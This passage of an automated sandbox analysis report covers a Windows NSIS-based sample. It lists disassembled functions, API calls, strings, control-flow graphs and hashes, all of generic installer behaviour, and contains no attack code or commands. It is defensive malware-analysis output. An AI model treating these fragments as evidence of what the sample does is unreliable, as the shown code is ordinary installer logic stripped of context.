                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                            • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                                            • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                                                                            • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                            • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                                                                                                                                            Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 790 406301-406315 FindFirstFileW 791 406322 790->791 792 406317-406320 FindClose 790->792 793 406324-406325 791->793 792->793
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                            • String ID: jF
                                                                                                                                                                                                                                                                                            • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                                            • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                            • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                                                                                                                                            Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 794 406328-40633e GetModuleHandleA 795 406340-406349 LoadLibraryA 794->795 796 40634b-406353 GetProcAddress 794->796 795->796 797 406359-40635b 795->797 796->797
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 310444273-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                            • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                                                                                                                                                                                                                                            Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                                            • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                                            • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                                            • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                                            • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                                            • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                                            • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                                            • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                                            • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                                            • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                                            • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                                            • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                                            • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                                            • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                                            • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                                            • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                                            • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                                            • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                                            • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                                            • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                                            • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                            • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                                                                                                                                                                                                                                                            Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                                            • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3282139019-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                            • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                                                                                                                                                                                                                                                            Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                                            • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                                              • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                                            • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                                            • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
